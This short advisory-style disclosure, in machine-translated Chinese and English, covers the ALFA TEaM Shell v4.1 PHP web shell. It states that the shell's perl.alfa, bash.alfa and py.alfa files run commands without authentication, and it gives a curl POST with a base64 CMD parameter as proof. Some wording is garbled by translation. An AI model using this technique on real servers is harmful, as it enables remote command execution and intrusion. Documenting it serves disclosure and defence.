ALFA TEaM Shell ~ v4.1一个发布新版本 PHP web shell 的组织是ALFA TEaM,这是一个可疑的伊朗组织,该组织创建了ALFA TEaMShell等网络恶意软件,过去曾被APT 33等针对能源和航空航天行业的威胁行为者使用过在过去。如果您有兴趣,FireEye 已经记录了对APT 33组战术的详细分析。
供应商主页:http://solevisible.com
软件链接:https://phpshells.com/alfa-tesla-v4-1-shell
版本:v4.1
测试:Windows 10 Enterprise x64,Linux
[关于-阿尔法团队壳牌特斯拉]:
它是黑客使用的最流行的 web shell 之一,他们用它来访问服务器端。
[易受攻击的文件]:
1 . perl.alfa
2 . bash.alfa
3 . py.alfa
[易受攻击的参数]:CMD
[描述]: #执行命令无需身份验证或登录web shell, To use,只找到一个易受攻击的文件,
Convert your commands to base64 and Submit your request using the CMD parameter and the POST method.
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
